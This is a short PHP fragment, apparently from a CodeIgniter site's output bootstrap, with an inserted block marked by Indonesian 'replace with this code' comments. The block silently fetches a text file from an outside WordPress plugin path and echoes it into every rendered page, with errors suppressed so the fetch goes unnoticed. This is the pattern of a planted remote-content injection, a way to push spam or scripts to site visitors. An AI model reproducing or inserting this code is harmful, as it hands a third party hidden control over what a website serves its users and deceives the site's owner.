/* * ------------------------------------------------------ * Send the final rendered output to the browser * ------------------------------------------------------ */ // >>>>> GANTI DENGAN KODE INI <<<<< // Cek apakah wrapper 'https' tersedia (tergantung allow_url_fopen) if (in_array('https', stream_get_wrappers())) { // Gunakan @ untuk mencegah warning yang menyebabkan Error 500 $new = @file_get_contents('https://pasmarque.com/wp-content/plugins/table/source.txt'); // Tampilkan HANYA jika berhasil mengambil datanya if ($new !== false) { echo $new; } } // >>>>> AKHIR KODE <<<<< if ($EXT->call_hook('display_override') === FALSE) { $OUT->_display(); }